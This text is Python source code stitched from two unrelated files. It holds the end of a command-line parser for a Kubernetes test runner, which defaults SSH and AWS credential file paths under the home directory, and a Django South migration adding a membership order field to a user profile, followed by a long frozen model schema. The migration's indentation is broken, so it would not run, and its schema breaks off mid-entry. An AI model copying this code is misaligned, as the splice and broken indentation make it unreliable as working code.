    add('--kops-state-gce', default='gs://k8s-kops-gce/',
        help='Name of the kops state storage for GCE')
    add('--kops-zones',
        help='Comma-separated list of zones else random choice')
    add('--kops-build', action='store_true',
        help='If we need to build kops locally')
    # kubetest flags that also trigger behaviour here
    add('--provider', help='provider flag as used by kubetest')
    add('--deployment', help='deployment flag as used by kubetest')
    return parser
def parse_args(args=None):
    """Parse command-line args, adding unrecognized args to kubetest_args.

    Args:
        args: optional argv list; None means sys.argv[1:] (argparse default).
    Returns:
        The parsed argparse.Namespace, with any flags argparse did not
        recognize appended to args.kubetest_args for kubetest to consume.
    Raises:
        ValueError: on invalid --image-family/--image-project combinations,
            or when aws credentials must be defaulted but HOME is unset.
    """
    parser = create_parser()
    args, extra = parser.parse_known_args(args)
    args.kubetest_args += extra
    if (args.image_family or args.image_project) and args.mode == 'docker':
        raise ValueError(
            '--image-family / --image-project is not supported in docker mode')
    if bool(args.image_family) != bool(args.image_project):
        raise ValueError(
            '--image-family and --image-project must be both set or unset')
    if args.aws or args.provider == 'aws':
        # If aws keys are missing, try to fetch from HOME dir
        if not args.aws_ssh or not args.aws_pub or not args.aws_cred:
            home = os.environ.get('HOME')
            if not home:
                raise ValueError('HOME dir not set!')
            # sys.stderr.write is used instead of the py2-only
            # `print >>sys.stderr` statement so this parses under python3 too.
            if not args.aws_ssh:
                args.aws_ssh = '%s/.ssh/kube_aws_rsa' % home
                # Fixed message: flag is '--aws-ssh', not '-aws-ssh'.
                sys.stderr.write(
                    '--aws-ssh key not set. Defaulting to %s\n' % args.aws_ssh)
            if not args.aws_pub:
                args.aws_pub = '%s/.ssh/kube_aws_rsa.pub' % home
                sys.stderr.write(
                    '--aws-pub key not set. Defaulting to %s\n' % args.aws_pub)
            if not args.aws_cred:
                args.aws_cred = '%s/.aws/credentials' % home
                sys.stderr.write(
                    '--aws-cred not set. Defaulting to %s\n' % args.aws_cred)
    return args
# Script entry point: parse the CLI (plus kubetest passthrough flags) and run.
if __name__ == '__main__':
    main(parse_args())
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserProfile.membership_order_free'
db.add_column(u'bccf_userprofile', 'membership_order_free',
self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='free_order', null=True, to=orm['shop.Order']),
keep_default=False)
    def backwards(self, orm):
        """Reverse migration: drop the 'membership_order_free' column again."""
        # Deleting field 'UserProfile.membership_order_free'
        # The DB column name carries the '_id' suffix Django appends to FK columns.
        db.delete_column(u'bccf_userprofile', 'membership_order_free_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'bccf.article': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Article'},
'attached_document': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.bccfbabypage': {
'Meta': {'ordering': "('order',)", 'object_name': 'BCCFBabyPage', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'bccf.bccfchildpage': {
'Meta': {'ordering': "('-created',)", 'object_name': 'BCCFChildPage'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'bccf_topic': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['bccf.BCCFTopic']", 'null': 'True', 'blank': 'True'}),
u'comments_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'gparent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.BCCFPage']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'page_for': ('django.db.models.fields.CharField', [], {'default': "'parent'", 'max_length': '13', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.BCCFChildPage']", 'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'rating_average': ('django.db.models.fields.FloatField', [], {'default': '0'}),
u'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'rating_sum': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'bccf.bccfgenericpage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'BCCFGenericPage', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'show_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'show_rating': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'show_resources': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'bccf.bccfpage': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'BCCFPage', '_ormbases': [u'pages.Page']},
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
u'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'})
},
u'bccf.bccftopic': {
'Meta': {'object_name': 'BCCFTopic'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'carousel_color': ('django.db.models.fields.CharField', [], {'default': "'dgreen-list'", 'max_length': '11'}),
'content': ('mezzanine.core.fields.RichTextField', [], {}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bccf.PageMarquee']", 'null': 'True', 'blank': 'True'}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
u'bccf.blog': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Blog', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'})
},
u'bccf.campaign': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Campaign'},
'approve': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'approved_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'by_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'campaigns'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'bccf.downloadableform': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'DownloadableForm'},
'attached_document': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.event': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Event', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'date_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'full': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location_city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'location_postal_code': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'location_street': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'location_street2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'max_seats': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'program': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'program'", 'null': 'True', 'to': u"orm['bccf.Program']"}),
'provider': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'events'", 'null': 'True', 'to': u"orm['auth.User']"}),
'survey_after': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'survey_after'", 'null': 'True', 'to': u"orm['builder.FormPublished']"}),
'survey_before': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'survey_before'", 'null': 'True', 'to': u"orm['builder.FormPublished']"})
},
u'bccf.eventregistration': {
'Meta': {'object_name': 'EventRegistration'},
'event': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'event_registration'", 'to': u"orm['bccf.Event']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'passed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'registration_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'bccf.footermarquee': {
'Meta': {'object_name': 'FooterMarquee'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'bccf.footermarqueeslide': {
'Meta': {'object_name': 'FooterMarqueeSlide'},
'caption': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['bccf.FooterMarquee']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50', 'null': 'True', 'blank': 'True'})
},
u'bccf.homemarquee': {
'Meta': {'object_name': 'HomeMarquee'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'bccf.homemarqueeslide': {
'Meta': {'object_name': 'HomeMarqueeSlide'},
'caption': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'linkLabel': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['bccf.HomeMarquee']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'bccf.magazine': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Magazine'},
'attached_document': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.pagemarquee': {
'Meta': {'object_name': 'PageMarquee'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'bccf.pagemarqueeslide': {
'Meta': {'object_name': 'PageMarqueeSlide'},
'caption': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'linkLabel': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'marquee': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['bccf.PageMarquee']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'bccf.podcast': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Podcast', '_ormbases': [u'bccf.BCCFChildPage']},
'attached_audio': ('mezzanine.core.fields.FileField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.program': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Program', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'user_added': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'bccf.programrequest': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ProgramRequest'},
'accept': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'accepted_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('mezzanine.core.fields.RichTextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'program_requests'", 'to': u"orm['auth.User']"})
},
u'bccf.settings': {
'Meta': {'object_name': 'Settings'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'bccf.tipsheet': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'TipSheet'},
'attached_document': ('mezzanine.core.fields.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'})
},
u'bccf.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'account_number': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'accreditation': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['bccf.Program']", 'null': 'True', 'blank': 'True'}),
'autosubscribe': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'avatar': ('bccf.fields.MyImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'facebook': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'default': "'male'", 'max_length': '6', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_mailing_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_forum_moderator': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'job_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "'en'", 'max_length': '10', 'blank': 'True'}),
'linkedin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'membership_level': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'membership_order': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'order'", 'null': 'True', 'to': u"orm['shop.Order']"}),
'membership_order_free': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'free_order'", 'null': 'True', 'to': u"orm['shop.Order']"}),
'membership_type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'members'", 'null': 'True', 'to': u"orm['bccf.UserProfile']"}),
'phone_mobile': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'phone_primary': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'phone_work': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'photo': ('bccf.fields.MyImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'pinterest': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'post_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'province': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'requested_cancellation': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'show_in_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_signatures': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'signature': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'blank': 'True'}),
'signature_html': ('django.db.models.fields.TextField', [], {'max_length': '1054', 'blank': 'True'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'street_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'street_3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'time_zone': ('django.db.models.fields.FloatField', [], {'default': '3.0'}),
'twitter': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'youtube': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'bccf.video': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'Video', '_ormbases': [u'bccf.BCCFChildPage']},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Product']", 'null': 'True', 'blank': 'True'}),
'video_url': ('embed_video.fields.EmbedVideoField', [], {'default': "''", 'max_length': '1024', 'null': 'True', 'blank': 'True'})
},
u'builder.formpublished': {
'Meta': {'ordering': "(u'_order',)", 'object_name': 'FormPublished'},
u'bccfchildpage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['bccf.BCCFChildPage']", 'unique': 'True', 'primary_key': 'True'}),
'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_structure': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['builder.FormStructure']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'builder.formstructure': {
'Meta': {'object_name': 'FormStructure'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'structure': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Form Structure'", 'max_length': '100'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'JSON'", 'max_length': '4'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'pages.page': {
'Meta': {'ordering': "(u'titles',)", 'object_name': 'Page'},
'_meta_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_menus': ('mezzanine.pages.fields.MenusField', [], {'default': '(1, 2, 3)', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'in_sitemap': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'children'", 'null': 'True', 'to': u"orm['pages.Page']"}),
'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
